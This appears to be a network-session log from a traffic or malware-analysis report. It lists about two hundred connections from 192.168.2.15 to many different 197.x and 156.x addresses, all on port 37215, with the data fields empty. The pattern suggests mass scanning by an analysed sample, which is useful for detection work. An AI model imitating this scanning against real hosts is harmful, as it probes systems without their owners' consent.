                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10728192.168.2.1550226197.238.211.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10729192.168.2.1550464197.66.148.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10730192.168.2.1553552197.119.6.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10731192.168.2.1552632197.200.160.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10732192.168.2.1538554197.79.191.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10733192.168.2.1546218197.247.66.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10734192.168.2.1546602197.175.30.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10735192.168.2.1538444197.35.83.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10736192.168.2.1552580197.38.210.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10737192.168.2.1542674197.173.242.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10738192.168.2.1557600197.152.47.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10739192.168.2.1545538197.0.192.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10740192.168.2.1559122197.228.233.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10741192.168.2.1537176197.27.115.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10742192.168.2.1552484197.76.36.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10743192.168.2.1536168197.250.181.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10744192.168.2.1559214197.81.226.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10745192.168.2.1551644197.62.186.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10746192.168.2.1539262197.115.152.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10747192.168.2.1546346197.118.176.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10748192.168.2.1546328197.81.15.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10749192.168.2.1544418197.219.63.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10750192.168.2.1537624197.248.47.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10751192.168.2.1542888197.29.169.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10752192.168.2.1553464197.65.70.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10753192.168.2.1537656197.191.45.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10754192.168.2.1541682197.109.180.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10755192.168.2.1544562197.250.188.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10756192.168.2.1553524197.236.35.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10757192.168.2.1551884197.92.74.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10758192.168.2.1537042197.60.64.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10759192.168.2.1549918197.107.226.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10760192.168.2.1560818197.239.69.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10761192.168.2.1554450197.26.158.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10762192.168.2.1556240197.48.244.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10763192.168.2.1543846197.77.123.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10764192.168.2.1551126197.112.44.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10765192.168.2.1545080197.32.187.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10766192.168.2.1553186197.138.147.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10767192.168.2.1538912197.82.221.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10768192.168.2.1535640197.35.43.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10769192.168.2.1536390197.57.148.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10770192.168.2.1560070197.76.159.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10771192.168.2.1540224197.111.244.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10772192.168.2.1551808197.250.128.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10773192.168.2.1532980197.22.136.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10774192.168.2.1556954197.246.221.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10775192.168.2.1556102197.62.111.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10776192.168.2.1551446197.218.222.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10777192.168.2.1537366197.198.75.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10778192.168.2.1540178197.234.215.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10779192.168.2.1558402197.161.2.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10780192.168.2.1553296197.120.95.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10781192.168.2.1560406197.121.155.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10782192.168.2.1544294197.45.202.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10783192.168.2.1543170197.135.237.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10784192.168.2.1542966197.70.179.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10785192.168.2.1544248197.62.99.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10786192.168.2.1543334197.68.20.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10787192.168.2.1553250197.148.184.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10788192.168.2.1535492197.236.196.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10789192.168.2.1558684197.170.132.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10790192.168.2.1549592197.58.69.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10791192.168.2.1548632197.170.90.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10792192.168.2.1535300197.1.115.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10793192.168.2.1544602197.32.200.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10794192.168.2.1560444197.81.225.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10795192.168.2.1551646197.34.113.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10796192.168.2.1556002197.212.100.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10797192.168.2.1557046197.233.98.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10798192.168.2.1542366197.184.74.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10799192.168.2.1540146197.53.200.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10800192.168.2.1541326197.59.158.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10801192.168.2.1536992197.160.240.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10802192.168.2.1546434197.196.208.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10803192.168.2.1553128197.96.10.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10804192.168.2.1547392197.237.202.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10805192.168.2.1547876197.162.213.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10806192.168.2.1550290197.188.123.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10807192.168.2.1545660197.103.98.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10808192.168.2.1555678197.80.220.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10809192.168.2.1539272197.74.167.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10810192.168.2.1556980197.146.99.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10811192.168.2.1557128197.254.225.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10812192.168.2.1535322197.163.132.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10813192.168.2.1550926197.120.86.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10814192.168.2.1543018197.8.7.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10815192.168.2.1532864197.200.136.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10816192.168.2.1537116197.25.7.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10817192.168.2.1555676197.181.147.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10818192.168.2.1547276197.231.191.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10819192.168.2.1543028197.46.38.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10820192.168.2.1537226197.228.135.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10821192.168.2.1552602197.185.172.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10822192.168.2.1538062197.6.186.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10823192.168.2.1537646197.129.91.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10824192.168.2.1537154197.73.153.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10825192.168.2.1538902197.190.240.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10826192.168.2.1553152197.136.128.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10827192.168.2.1553260197.222.240.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10828192.168.2.1537976197.46.139.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10829192.168.2.1546286197.119.48.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10830192.168.2.1539534197.182.85.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10831192.168.2.1560930197.102.109.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10832192.168.2.1555084197.186.198.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10833192.168.2.1533822197.165.48.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10834192.168.2.1555944197.104.201.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10835192.168.2.1549916197.154.199.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10836192.168.2.1535698197.42.71.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10837192.168.2.1536112197.52.13.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10838192.168.2.1550416197.116.57.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10839192.168.2.1545030197.130.15.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10840192.168.2.1550752197.236.55.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10841192.168.2.1558146197.144.78.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10842192.168.2.1539258197.129.86.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10843192.168.2.1533424197.32.26.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10844192.168.2.1552344197.36.106.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10845192.168.2.1544246197.91.213.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10846192.168.2.1542598197.30.206.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10847192.168.2.1537166197.47.18.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10848192.168.2.1560712197.1.220.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10849192.168.2.1536172197.96.71.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10850192.168.2.1535450197.102.76.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10851192.168.2.1547702197.226.191.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10852192.168.2.1556916197.79.17.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10853192.168.2.1532910197.145.202.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10854192.168.2.1540524197.229.56.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10855192.168.2.1548978197.101.42.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10856192.168.2.1547848197.162.16.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10857192.168.2.1548184197.134.29.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10858192.168.2.1536048197.69.101.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10859192.168.2.1547702197.159.88.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10860192.168.2.1541976197.204.181.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10861192.168.2.1542874197.197.112.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10862192.168.2.1552362197.243.254.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10863192.168.2.1538628197.98.229.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10864192.168.2.1551084197.55.158.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10865192.168.2.1557974197.185.87.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10866192.168.2.1551922197.154.35.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10867192.168.2.1558300197.28.149.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10868192.168.2.1542922197.173.116.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10869192.168.2.1542386197.130.32.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10870192.168.2.1534170197.17.115.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10871192.168.2.1538228197.182.180.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10872192.168.2.1542522197.1.95.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10873192.168.2.1553416197.229.119.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10874192.168.2.1559950197.90.175.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10875192.168.2.1545466197.211.83.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10876192.168.2.1533236197.106.179.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10877192.168.2.1550620197.31.242.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10878192.168.2.1536886197.90.95.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10879192.168.2.1548388197.39.240.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10880192.168.2.1553448197.42.100.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10881192.168.2.1556356197.76.119.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10882192.168.2.1545304197.177.246.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10883192.168.2.1533344197.70.83.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10884192.168.2.1553698197.103.50.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10885192.168.2.1556670197.198.195.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10886192.168.2.1535526197.55.79.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10887192.168.2.1551256197.202.195.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10888192.168.2.1540050156.71.207.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10889192.168.2.1536744156.27.117.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10890192.168.2.1542954156.73.2.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10891192.168.2.1559744156.36.65.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10892192.168.2.1543294156.95.125.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10893192.168.2.1533920156.207.205.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10894192.168.2.1558202156.85.96.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10895192.168.2.1544962156.104.69.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10896192.168.2.1542816156.176.33.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10897192.168.2.1540914156.146.13.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10898192.168.2.1544364156.25.91.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10899192.168.2.1535168156.71.133.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10900192.168.2.1550224156.96.75.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10901192.168.2.1541240156.1.12.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10902192.168.2.1542048156.215.68.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10903192.168.2.1543636156.35.232.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10904192.168.2.1548104156.7.136.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10905192.168.2.1536070156.199.178.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10906192.168.2.1553638156.18.230.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10907192.168.2.1548392156.52.54.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10908192.168.2.1554090156.150.92.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10909192.168.2.1537168156.104.205.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10910192.168.2.1549312156.90.22.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10911192.168.2.1557946156.246.124.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10912192.168.2.1553764156.201.104.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10913192.168.2.1558788156.166.62.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10914192.168.2.1536988156.49.11.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10915192.168.2.1537954156.14.236.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10916192.168.2.1559736156.138.39.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10917192.168.2.1547218156.202.139.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10918192.168.2.1556162156.74.42.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10919192.168.2.1543798156.127.145.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10920192.168.2.1555200156.194.88.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10921192.168.2.1537830156.102.206.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10922192.168.2.1556802156.229.135.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10923192.168.2.1539768156.24.32.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10924192.168.2.1551688156.162.119.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10925192.168.2.1532776156.65.118.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10926192.168.2.1539552156.210.100.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            10927192.168.2.1534868156.100.146.16737215
                                                                            TimestampBytes transferredDirectionData


